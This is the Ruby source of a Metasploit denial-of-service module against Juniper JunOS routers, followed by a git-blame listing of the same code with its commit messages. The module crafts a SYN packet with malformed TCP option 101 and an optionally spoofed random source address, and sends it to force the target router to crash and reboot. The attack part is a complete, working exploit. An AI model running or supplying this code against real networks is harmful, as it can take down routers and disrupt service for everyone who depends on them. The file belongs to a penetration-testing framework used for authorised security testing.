metasploit-framework/modules/auxiliary/dos/tcp/junos_tcp_opt.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Capture
	include Msf::Auxiliary::Dos

	# The whole point is to cause a router crash.
	Rank = ManualRanking

	def initialize
		super(
			'Name'        => 'Juniper JunOS Malformed TCP Option',
			'Description' => %q{ This module exploits a denial of service vulnerability in Juniper Network's JunOS router operating system. By sending a TCP packet with TCP option 101 set, an attacker can cause an affected router to reboot.
				},
			'Author'      => 'todb',
			'License'     => MSF_LICENSE,
			'References' =>
				[
					['BID', '37670'],
					['OSVDB', '61538'],
					['URL','http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/']
				],
			'Version'     => '$Revision$' # 02/02/2010
		)

		register_options([
			OptInt.new('RPORT', [false, 'The destination port (defaults to random)']),
			OptInt.new('SPORT', [false, 'Source port (defaults to random)']),
			OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])
		])

		deregister_options('FILTER','PCAPFILE', 'SNAPLEN')
	end

	def rport
		datastore['RPORT'].to_i.zero? ? rand(0xffff) : datastore['RPORT'].to_i
	end

	def sport
		datastore['SPORT'].to_i.zero? ? rand(0xffff) : datastore['SPORT'].to_i
	end

	def shost
		datastore['SHOST'] || IPAddr.new(rand(0xffffffff), Socket::AF_INET).to_s
	end

	def run

		open_pcap
		
		p = PacketFu::TCPPacket.new
		p.ip_daddr = rhost
		p.ip_saddr = shost
		p.ip_ttl = rand(128) + 128
		p.tcp_sport = sport
		p.tcp_dport = rport
		p.tcp_flags.syn = 1
		p.tcp_win = rand(4096)+1
		p.tcp_opts = "e\x02\x01\x00" # Opt 101, len 2, nop, eol
		p.recalc
		print_status("#{p.ip_daddr}:#{p.tcp_dport} Sending TCP Syn packet from #{p.ip_saddr}:#{p.tcp_sport}")
		capture_sendto(p,rhost)
		close_pcap
	end
end
Adding a Juniper JunOS DoS exploit (no CVE, BID: 37670) git-svn-id: file:///home/svn/framework3/trunk@8349 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-02 17:19:14 +00:00			`##`
			`# $Id$`
			`##`

			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Adding a Juniper JunOS DoS exploit (no CVE, BID: 37670) git-svn-id: file:///home/svn/framework3/trunk@8349 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-02 17:19:14 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Capture`
			`include Msf::Auxiliary::Dos`

			`# The whole point is to cause a router crash.`
Moving dos modules to manual ranking. git-svn-id: file:///home/svn/framework3/trunk@13940 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-15 22:20:04 +00:00			`Rank = ManualRanking`
Adding a Juniper JunOS DoS exploit (no CVE, BID: 37670) git-svn-id: file:///home/svn/framework3/trunk@8349 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-02 17:19:14 +00:00
			`def initialize`
			`super(`
			`'Name' => 'Juniper JunOS Malformed TCP Option',`
			`'Description' => %q{ This module exploits a denial of service vulnerability in Juniper Network's JunOS router operating system. By sending a TCP packet with TCP option 101 set, an attacker can cause an affected router to reboot.`
			`},`
			`'Author' => 'todb',`
			`'License' => MSF_LICENSE,`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'References' =>`
Adding a Juniper JunOS DoS exploit (no CVE, BID: 37670) git-svn-id: file:///home/svn/framework3/trunk@8349 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-02 17:19:14 +00:00			`[`
			`['BID', '37670'],`
			`['OSVDB', '61538'],`
			`['URL','http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/']`
			`],`
Fixing revision keyword git-svn-id: file:///home/svn/framework3/trunk@8351 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-02 17:37:34 +00:00			`'Version' => '$Revision$' # 02/02/2010`
Adding a Juniper JunOS DoS exploit (no CVE, BID: 37670) git-svn-id: file:///home/svn/framework3/trunk@8349 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-02 17:19:14 +00:00			`)`

			`register_options([`
			`OptInt.new('RPORT', [false, 'The destination port (defaults to random)']),`
			`OptInt.new('SPORT', [false, 'Source port (defaults to random)']),`
			`OptAddress.new('SHOST', [false, 'Source address (defaults to random)'])`
			`])`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Adding a Juniper JunOS DoS exploit (no CVE, BID: 37670) git-svn-id: file:///home/svn/framework3/trunk@8349 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-02 17:19:14 +00:00			`deregister_options('FILTER','PCAPFILE', 'SNAPLEN')`
			`end`

			`def rport`
			`datastore['RPORT'].to_i.zero? ? rand(0xffff) : datastore['RPORT'].to_i`
			`end`

			`def sport`
			`datastore['SPORT'].to_i.zero? ? rand(0xffff) : datastore['SPORT'].to_i`
			`end`

			`def shost`
			`datastore['SHOST'] \|\| IPAddr.new(rand(0xffffffff), Socket::AF_INET).to_s`
			`end`

			`def run`

			`open_pcap`
Fixes #5038. Removes all instances of Racket objects, as far as I can tell. If I missed any through my mighty grep -ril racket . statement, please reopen! git-svn-id: file:///home/svn/framework3/trunk@13342 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-26 01:29:21 +00:00
			`p = PacketFu::TCPPacket.new`
			`p.ip_daddr = rhost`
			`p.ip_saddr = shost`
			`p.ip_ttl = rand(128) + 128`
			`p.tcp_sport = sport`
			`p.tcp_dport = rport`
			`p.tcp_flags.syn = 1`
			`p.tcp_win = rand(4096)+1`
			`p.tcp_opts = "e\x02\x01\x00" # Opt 101, len 2, nop, eol`
			`p.recalc`
			`print_status("#{p.ip_daddr}:#{p.tcp_dport} Sending TCP Syn packet from #{p.ip_saddr}:#{p.tcp_sport}")`
			`capture_sendto(p,rhost)`
Adding a Juniper JunOS DoS exploit (no CVE, BID: 37670) git-svn-id: file:///home/svn/framework3/trunk@8349 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-02 17:19:14 +00:00			`close_pcap`
			`end`
			`end`